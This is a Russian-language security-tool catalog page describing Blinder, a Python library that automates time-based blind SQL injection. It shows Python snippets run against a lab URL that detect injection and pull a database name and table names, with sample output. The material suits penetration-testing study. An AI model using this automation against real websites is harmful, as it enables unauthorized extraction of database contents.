Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Blinder — Библиотека Python для автоматизации временной слепой SQL-инъекции | Kitploit
Инструменты/GitHubGitHub/mhaskar/blinder
Анализ уязвимостейВеб-безопасностьТестирование на ПроникновениеБезопасность Баз Данных
GitHubmhaskar/blinder

Blinder

Библиотека Python для автоматизации временной слепой SQL-инъекции

Репозиторий
50156 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Blinder

Blidner — это небольшая библиотека на Python для автоматизации временной слепой SQL-инъекции с использованием предопределённых запросов в качестве функций для автоматизации быстрой разработки PoC.

Установка

Вы можете установить Blinder с помощью следующей команды:

pip install blinder

Или загрузив исходный код и импортировав его вручную в ваш проект.

Использование

Чтобы использовать Blinder, вам нужно импортировать модуль Blinder, а затем начать использовать основные функции Blinder.

С помощью текущей версии Blinder вы можете:

  • Проверить наличие временной инъекции.
  • Получить имя базы данных.
  • Получить имена таблиц.

Вы можете проверить наличие инъекции в URL-адресе с помощью следующего кода:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print blind.check_injection()

Результат выполнения:

root@kitploit:~
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#

Вы можете получить имя базы данных с помощью следующего кода:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print "Database name is : %s " % blind.get_database()

И результат будет:

root@kitploit:~
root@kali:~/Desktop# python get-database.py
Database name is : db1
root@kali:~/Desktop#

Чтобы получить имена таблиц, вы можете использовать следующий код:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

tables = blind.get_tables()

for table in tables:
    print table

И результат будет:

root@kitploit:~
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#

TODO

Скоро будет добавлено множество функций, например:

  • возможность добавлять пользовательские запросы
  • тестирование точек инъекции на основе запроса Burp
  • извлечение данных таблиц/столбцов
Скачать инструмент